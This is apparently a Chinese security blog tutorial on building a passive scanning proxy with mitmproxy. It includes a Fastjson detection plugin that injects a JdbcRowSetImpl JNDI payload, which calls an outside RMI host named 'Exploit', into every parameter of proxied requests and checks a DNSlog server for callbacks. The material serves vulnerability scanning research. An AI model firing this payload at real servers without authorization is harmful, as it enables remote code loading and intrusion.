基于mitmproxy的被動掃描代理

2019-10-10 119101人圍觀 ,發現 1 個不明物體 WEB安全

前言

Web代理服務器是網絡的中間實體,代理位于客戶端和服務器之間,扮演中間人的角色,在各端點之間來回傳輸HTTP報文,而其具體實現有諸如Goproxy,mitmproxy等等開源項目,其中的mitmproxy是Python編寫的一款功能完善的代理工具,mitmproxy是一款支持攔截HTTP和HTTPS請求和響應并即時修改它們的交互式中間人代理工具。同時它提供了Python API給開發者編寫插件用來自定義對流量進行處理和修改。

本章會使用mitmproxy去實現一個簡單的被動掃描代理,以供思路參考。

概述

git clone https://github.com/mitmproxy/mitmproxy.git
cd mitmproxy
./dev.sh

版本 5.0.0.dev

1.png

設置完代理之后,mitmdump爬取效果如下:

2.jpg

mitmproxy的被動掃描代理思路

mitmprxoy 0.16以下的版本是提供libmproxy庫給開發者進行拓展的,目前使用的mitmproxy 5.0.5 Dev,已經沒有對libmproxy模塊進行維護了,其官方文檔推薦的是使用mitmproxy的addons插件模塊(內聯腳本)進行拓展。內聯腳本可以使用mitmdump進行執行,以 > mitmdump -s ./anatomy.py 的方式進行調用。官方文檔對于addons插件模塊的內聯腳本格式如下:如上所示,插件中的request和response函數可以用于分別處理對應的請求參數,其函數接受的flow參數為mitmporxy/http.py中的HTTPflow 數據流類,其類中包含HTTPrequest和HTTPresponse等屬性。

from mitmproxy import ctx
class Counter:
    def __init__(self):
        self.num = 0
    def request(self, flow):
        self.num = self.num + 1
        ctx.log.info("We've seen %d flows" % self.num)
addons = [
    Counter()
]

如上所示,插件中的request和response函數可以用于分別處理對應的請求參數,其函數接受的flow參數為mitmporxy/http.py中的HTTPflow 數據流類,其類中包含HTTPrequest和HTTPresponse等屬性。

3.jpg

對于數據流的請求對象調用,則使用flow.request的方式調用,其數據對象為HTTPrequest對象 ,對象的內容和屬性如下所示。

4.jpg

本章被動掃描代理的為被動代理(獲取數據流) -> 掃描器掃描的思路。
通過被動掃描器獲取數據流然后將數據流導入到掃描進程中,掃描進程進行掃描,輸出結果的方式,下面會以demo進行實例。demo將會分別啟用掃描和代理兩個進程,通過接受代理請求流導入到掃描進程中進行掃描,雙進程間主要使用queue來進行進程間的通信。

官方文檔介紹的插件運行是以mitmdump -s ./anatomy.py控制終端執行的方式,但為了方便掃描器進行集成,這里采用直接調用mitmproxy模塊的方式進行調用。

調用mitmproxy模塊的方式主要是通過模擬mitmdump的啟動模式進行插件的調用。代碼如下,mitmproxy.tools._main將會調用DumpMaster,DumpMaster是master.Master的子類,master.Master是mitmproxy的主線程處理的核心類。

from mitmproxy.tools._main import run
def mitmdump(args=None) -> typing.Optional[int]:
    def extra(args):
        if args.filter_args:
            v = " ".join(args.filter_args)
            return dict(
                save_stream_filter=v,
                readfile_filter=v,
                dumper_filter=v,
            )
        return {}
    m = run(DumpMaster, cmdline.mitmdump, args, extra)
    if m and m.errorcheck.has_errored:
        return 1
    return None

DumpMaster代碼如下,通過self.addons.add(HandleRequest(request_queue))的方式添加我們的數據處理插件HandleRequest(),然后使用with_handle_request=True的方式進行啟用。

class DumpMaster(master.Master):
    def __init__(
        self,
        options: options.Options,
        with_termlog=False,
        with_dumper=False, # 打印出數據流
        with_handle_request=True,
        with_fast_json_check = True
    ) -> None:
        super().__init__(options)
        self.errorcheck = ErrorCheck()
        if with_termlog: # 添加插件
            self.addons.add(termlog.TermLog(), termstatus.TermStatus())
        self.addons.add(*addons.default_addons())
        if with_dumper:
            self.addons.add(dumper.Dumper())
        if with_handle_request: # 處理請求
            self.addons.add(HandleRequest(request_queue)) # 添加自己的處理請求插件
        if with_fast_json_check:
            self.addons.add(FastJsonCheck())  # 添加fastjson漏洞檢測插件
        self.addons.add(
            keepserving.KeepServing(),
            readfile.ReadFileStdin(),
            self.errorcheck
        )

下面的代碼為數據流處理實例,數據流處理后的結果將會通過queue的方式傳給掃描器進程。

from mitmproxy import ctx
from mitmproxy.http import HTTPFlow
from gevent.queue import Queue
class HandleRequest:
    def __init__(self,request_queue: Queue):
        self.num = 0
        self.request_queue = request_queue
    def request(self, flow: HTTPFlow):
        self.num = self.num + 1
        self.request_queue.put(flow.request.url) # 添加進程
    def response(self,flow: HTTPFlow):
        self.num = self.num + 1

下面代碼為掃描器進程demo的代碼。它會以Queue接受代理線程傳遞過來的數據,然后對數據處理,并進程掃描。

request_queue = Queue()
# 掃描進程 通過進程通信,獲取請求數據。
def start_scan():
    while 1:
        if not request_queue.empty():
            print("scan ====> " + request_queue.get())
        time.sleep(1)

最后以多線程的方式啟動代理進程和掃描器進程。

scanner = threading.Thread(target=start_scan)
    scanner.setDaemon(True) # 守護進程
    scanner.start()
    args = ['--listen-host', '127.0.0.1', '--listen-port', str(8788)]
    print("Proxy server listening at http://127.0.0.1:8788")
    mitmdump(args)

詳細代碼myproxy.py

import typing
from mitmproxy.tools import cmdline
from mitmproxy import addons
from mitmproxy import options
from mitmproxy import master
from mitmproxy.addons import dumper, termlog, termstatus, keepserving, readfile
from handlerequest import HandleRequest
from fastjson_vuln_check import FastJsonCheck
from mitmproxy.tools._main import run
import threading
import time
from queue import Queue
request_queue = Queue()
def mitmdump(args=None) -> typing.Optional[int]:
    def extra(args):
        if args.filter_args:
            v = " ".join(args.filter_args)
            return dict(
                save_stream_filter=v,
                readfile_filter=v,
                dumper_filter=v,
            )
        return {}
    m = run(DumpMaster, cmdline.mitmdump, args, extra)
    if m and m.errorcheck.has_errored:
        return 1
    return None
class ErrorCheck:
    def __init__(self):
        self.has_errored = False
    def log(self, e):
        if e.level == "error":
            self.has_errored = True
class DumpMaster(master.Master):
    def __init__(
        self,
        options: options.Options,
        with_termlog=False,
        with_dumper=False, # 打印出數據流
        with_handle_request=True,
        with_fast_json_check = True
    ) -> None:
        super().__init__(options)
        self.errorcheck = ErrorCheck()
        if with_termlog: # 添加插件
            self.addons.add(termlog.TermLog(), termstatus.TermStatus())
        self.addons.add(*addons.default_addons())
        if with_dumper:
            self.addons.add(dumper.Dumper())
        if with_handle_request: # 處理請求
            self.addons.add(HandleRequest(request_queue)) # 添加自己的處理請求插件
        if with_fast_json_check:
            self.addons.add(FastJsonCheck())  # 添加fastjson漏洞檢測插件
        self.addons.add(
            keepserving.KeepServing(),
            readfile.ReadFileStdin(),
            self.errorcheck
        )
# 掃描進程 通過進程通信,獲取請求數據。
def start_scan():
    while 1:
        if not request_queue.empty():
            print("scan ====> " + request_queue.get())
        time.sleep(1)
if __name__ == '__main__':
    scanner = threading.Thread(target=start_scan)
    scanner.setDaemon(True) # 守護進程
    scanner.start()
    args = ['--listen-host', '127.0.0.1', '--listen-port', str(8788)]
    print("Proxy server listening at http://127.0.0.1:8788")
    mitmdump(args)

插件代碼handlerequest.py

from mitmproxy import ctx
from mitmproxy.http import HTTPFlow
from gevent.queue import Queue
class HandleRequest:
    def __init__(self,request_queue: Queue):
        self.num = 0
        self.request_queue = request_queue
    def request(self, flow: HTTPFlow):
        self.num = self.num + 1
        self.request_queue.put(flow.request.url) # 添加進程
    def response(self,flow: HTTPFlow):
        self.num = self.num + 1

啟動代理后效果如下。python3 myproxy.py 啟動

5.png

mitmproxy插件化Fastjson漏洞掃描思路

mitmproxy的支持的addons插件模塊允許開發者其自定義對流量進行處理和修改,對于XXE,Fastjson,等基于交互流量的漏洞檢測就可以通過mitmptoxy的插件模塊進行實現,下面會以fastjson檢測腳本進行測試。插件的功能為通過識別application/json數據,然后使用fastjson payload進行發送,通過判斷dnslog的的日志結果存在與否來判斷漏洞的存在,具體代碼如下代碼如下:

__author__ = @星光
# -*- coding: UTF-8 -*-
import json
from urllib import parse
import copy
import requests
import time
from mitmproxy.http import HTTPFlow
class FastJsonCheck:
    def __init__(self):
        self.num = 0
    def request(self, flow: HTTPFlow):
        self.num = self.num + 1
        req = ObjectDict()
        req.target = flow.request.url
        content_type = flow.request.headers.get("Content-Type")
        if "application/json" in content_type:
            print("start check fastjosn vuln")
            req.headers =  flow.request.headers
            req.method = flow.request.method
            data = r'{}'
            req.data = data
            req_list = [req]
            for req in req_list:
                if req.get('data'):
                    check_data(req)
                check_target(req)
    def response(self,flow: HTTPFlow):
        self.num = self.num + 1
class ObjectDict(dict):
    """Makes a dictionary behave like an object, with attribute-style access.
    """
    def __getattr__(self, name):
        # type: (str) -> any
        try:
            return self[name]
        except KeyError:
            raise AttributeError(name)
    def __setattr__(self, name, value):
        # type: (str, any) -> None
        self[name] = value
fastjson_paylod = '{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://[qtn3aviq63by76utx7jcwrpxtozen3]/Exploit","autoCommit":true}}'
dns_service_address = 'http://xxx.xxx.xxx.xxx:5000'
def get_random_dns_server():
    for i in range(3):
        try:
            resp = requests.post('%s/genname' % dns_service_address, json={'callback': '', 'info': ''},
                                 timeout=(3, 6))
            return str(resp.json()['name'])
        except:
            print(u'Error when get dns server:')
    return None
def has_query_log_for_dns(dns_server):
    for i in range(3):
        try:
            resp = requests.get('%s/success/%s' % (dns_service_address, dns_server), timeout=(3, 6))
            return resp.json()['success']
        except:
            print(u'Error when verify dns server:')
    return None
def is_json(data):
    try:
        value = json.loads(data)
        if isinstance(value, (dict, list)):
            return True
    except Exception as e:
        return False
    return False
def iter_dict(item, json_flag=False):
    if json_flag:
        if isinstance(item, list):
            yield json.loads("[{}]".format(fastjson_paylod))
        if isinstance(item, dict):
            yield json.loads(fastjson_paylod)
    if not isinstance(item, dict):
        return
    for x in item:
        if is_json(item[x]):
            copy_item = copy.deepcopy(item)
            value = json.loads(item[x])
            if isinstance(value, list):
                copy_item[x] = "[{}]".format(fastjson_paylod)
                yield copy_item
            if isinstance(item, dict):
                copy_item[x] = fastjson_paylod
                yield copy_item
def form2dict(data):
    data_dict = parse.parse_qs(data)
    for k in data_dict:
        data_dict[k] = data_dict[k][0]
    return data_dict
def check_data(req_info):
    data = req_info.data
    conten_type = req_info.headers.get("Content-Type", "application/x-www-form-urlencoded")
    is_json = False
    if 'x-www-form-urlencoded' in conten_type:
        is_json = False
    if 'json' in conten_type or 'javascript' in conten_type:
        is_json = True
    if not is_json:
        data_dict = form2dict(data)
    else:
        data_dict = json.loads(data)
    for x in iter_dict(data_dict, is_json):
        copy_req = copy.deepcopy(req_info)
        if is_json:
            copy_req.data = json.dumps(x)
        else:
            copy_req.data = x
        dns_server = get_random_dns_server()
        copy_req.data = copy_req.data.replace("[qtn3aviq63by76utx7jcwrpxtozen3]", dns_server)
        send_req(copy_req)
        time.sleep(1.5)
        if has_query_log_for_dns(dns_server):
            print("[success] found fastjson vul\n{}\n".format(copy_req))
def check_target(req_info):
    target = req_info.target
    parsed = parse.urlparse(target)
    query = parsed.query
    if not query:
        return
    for x in iter_dict(form2dict(query)):
        copy_req = copy.deepcopy(req_info)
        x = parse.urlencode(x)
        copy_req.target = "{}://{}{}?{}".format(
            parsed.scheme, parsed.netloc, parsed.path, x)
        dns_server = get_random_dns_server()
        copy_req.target = copy_req.target.replace("[qtn3aviq63by76utx7jcwrpxtozen3]", dns_server)
        send_req(copy_req)
        time.sleep(1.5)
        if has_query_log_for_dns(dns_server):
            print("[success] found fastjson vul\n{}\n".format(copy_req))
UA = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
def http_req(url, method='get', **kwargs):
    kwargs.setdefault('verify', False)
    kwargs.setdefault('timeout', (10.1, 30.1))
    kwargs.setdefault('allow_redirects', False)
    headers = kwargs.get("headers", {})
    headers.setdefault("User-Agent", UA)
    kwargs["headers"] = headers
    method = method.lower()
    conn = getattr(requests, method)(url, **kwargs)
    return conn
def send_req(req_info):
    conn = http_req(req_info.target, req_info.method, data=req_info.data, headers=req_info.headers)

結果如下:

6.jpg

參考

GitHub–w-digital-scanner/w13scan: Passive Security Scanner (被動安全掃描器)

mitmproxy官方文檔

《HTTP權威指南》

*本文作者:斗象智能安全平臺,轉載請注明來自FreeBuf.COM

相關推薦
發表評論

已有 1 條評論

取消
Loading...
斗象智能安全平臺

以IT資產為核心的全息安全監控與分析

40 文章數 2 評論數 2 關注者

特別推薦

活動預告

填寫個人信息

姓名
電話
郵箱
公司
行業
職位
css.php 微信上那些说赚钱是真的吗